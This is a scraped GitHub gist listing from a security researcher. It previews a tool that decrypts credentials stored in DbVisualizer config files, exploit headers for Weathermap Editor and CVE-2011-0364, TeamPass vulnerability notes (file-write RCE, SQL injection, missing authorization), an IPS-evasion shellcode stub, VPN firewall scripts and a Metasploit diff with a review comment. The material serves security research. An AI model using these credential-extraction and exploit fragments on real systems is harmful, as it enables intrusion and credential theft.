Gerry Eisenhaur gerry

Block or report user

Report or block gerry

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@gerry
gerry / decrypt_dbvis.py
Last active Apr 20, 2018
A quick hack to extract and decrypt credentials from DbVisualizer config files.
#!/usr/bin/env python
# decrypt_dbvis.py ~ gerry@twitter.com
# DbVisualizer uses PBEWithMD5AndDES with a static key to store passwords.
# This is a quick hack to extract and decrypt credentials from DbVisualizer config files.
# Tested against DbVisualizer Free 9.0.9 and 9.1.6
"""
[2014-03-25 02:05:30][not-the-sea workspace]$ security/p/gerry/misc/decrypt_dbvis.py
[+] DbVisualizer Password Extractor and Decryptor (@gerryeisenhaur)
[+] Additional Usage Options:
[+] security/p/gerry/misc/decrypt_dbvis.py <config filename>
gerry / cracking_rig.md
Created Aug 26, 2016
My current cracking rig (4x GTX980ti's)
gerry / hashcat_benchmark.txt
Created Aug 26, 2016
A hashcat benchmark of my current cracking rig (4x GTX980Ti's)
hashcat (v3.10-3-g13cbe42) starting in benchmark-mode...
OpenCL Platform #1: NVIDIA Corporation
======================================
- Device #1: GeForce GTX 980 Ti, 1519/6077 MB allocatable, 22MCU
- Device #2: GeForce GTX 980 Ti, 1519/6077 MB allocatable, 22MCU
- Device #3: GeForce GTX 980 Ti, 1519/6077 MB allocatable, 22MCU
- Device #4: GeForce GTX 980 Ti, 1519/6077 MB allocatable, 22MCU
Hashtype: MD4
gerry / weathermap_editor_exec.rb
Created Aug 23, 2016
Weathermap Editor (cacti plugin) Arbitrary Code Execution
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
gerry / st_upload-exploit.py
Last active Aug 23, 2016
Exploit for CVE-2011-0364
#!/usr/bin/env python
# Thu 24 Jun 2010 04:20:52 AM EDT
import httplib
import mimetools
import StringIO
_boundary = mimetools.choose_boundary()
_host_uid = 'C087EFAE-05A2-4A0B-9512-E05E5ED84AEB'
_csamc = "192.168.0.108"
gerry / teampass_notes.md

Arbitrary file data write (leading to RCE)

./sources/export.queries.php:471: $outstream = fopen($_POST['file'], "a"); (place php in item description)

./sources/admin.queries.php:1110: $fh = fopen($tmp_skfile, 'w'); (admin required)

SQLi

./sources/views.queries.php:437: ORDER BY ".$_POST['order']." ".$_POST['direction']." (admin required)

No Authz on file download:

./sources/downloadFile.php:47: $fp = fopen($_SESSION['settings']['path_to_upload_folder'].'/'.$result['file'], 'rb');

gerry / evasions.py
Created Apr 18, 2010
collection of various IPS evasions
import struct

# scode is the payload byte string defined earlier in the gist
offset = 0x1000 - len(scode) - 32
tls_header = "\xE8\x00\x00\x00\x00" # CALL $+5
tls_header += "\x5E" # POP ESI
tls_header += "\x83\xC6\x1B" # ADD ESI, 0x1b
tls_header += "\xB9" + struct.pack("<L", len(scode)) # MOV ECX, len(scode)
tls_header += "\x64\x8B\x3D\x30\x00\x00\x00" # MOV EDI,DWORD PTR FS:[30]
tls_header += "\x81\xC7" + struct.pack("<L", offset) # ADD EDI, offset
tls_header += "\x57" # PUSH EDI
tls_header += "\xFC" # CLD
tls_header += "\xF3\xA4" # REP MOVSB [EDI], [ESI]
gerry / kill-switch.sh
#!/bin/sh -e
# VPN kill switch: deny all traffic by default and only allow it over the tun0 VPN tunnel
DEFAULT_IFACE=enp0s3
# Local subnet (CIDR) of the default interface
LOCAL_NET=$(ip -o -f inet addr show "$DEFAULT_IFACE" | awk '{print $4}')
# VPN endpoint addresses (same list as in update-pia-hosts.sh)
HOST_IPS=198.8.80.220,198.8.80.223,198.8.80.33,198.8.80.149,198.8.80.180,198.8.80.221,198.8.80.50,198.8.80.203,198.8.80.162,198.8.80.176,107.152.98.168,198.8.80.222,107.152.98.159
ufw --force reset
ufw default deny outgoing
ufw default deny incoming
ufw allow out on tun0 from any to any
ufw allow in on tun0 from any to any
gerry / update-pia-hosts.sh
#!/bin/sh -e
HOSTNAME=us-california.privateinternetaccess.com
# host us-california.privateinternetaccess.com|cut -d' ' -f4|tr \\n ,
HOST_IPS=198.8.80.220,198.8.80.223,198.8.80.33,198.8.80.149,198.8.80.180,198.8.80.221,198.8.80.50,198.8.80.203,198.8.80.162,198.8.80.176,107.152.98.168,198.8.80.222,107.152.98.159
# Pick one of the VPN endpoint addresses at random
IP=$(echo "$HOST_IPS" | tr , '\n' | shuf | head -n 1)
# Pin the chosen address in /etc/hosts, replacing any existing entry for the hostname
if grep -q "$HOSTNAME" /etc/hosts; then
    sed -i "s/.*$HOSTNAME/$IP $HOSTNAME/" /etc/hosts
else
    echo "$IP $HOSTNAME" >> /etc/hosts
fi
gerry / import_nessus_nbe.diff
Created Feb 27, 2013
Quick fix for importing Nessus NBE files
diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb
index 7e0bc73..9b5c8d8 100644
--- a/lib/msf/core/db.rb
+++ b/lib/msf/core/db.rb
@@ -5163,11 +5163,11 @@ class DBManager
# There is no place the NBE actually stores the plugin name used to
# scan. You get "Security Note" or "Security Warning," and that's it.
def import_nessus_nbe(args={}, &block)
- data = args[:data]
+ nbe_data = args[:data]
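Review bot: renaming the local `data` to `nbe_data` at the top of `import_nessus_nbe` is only safe if every later reference to `data` inside the method is renamed in the same change; otherwise the method raises a NameError the first time the old name is used. The `@@ -5163,11 +5163,11 @@` header shows an equal-sized hunk, so the remaining lines should carry those renamed call-sites. The description ("Quick fix for importing Nessus NBE files") also does not say what the rename fixes; a sentence in the commit message explaining the clash the old `data` name caused would help reviewers.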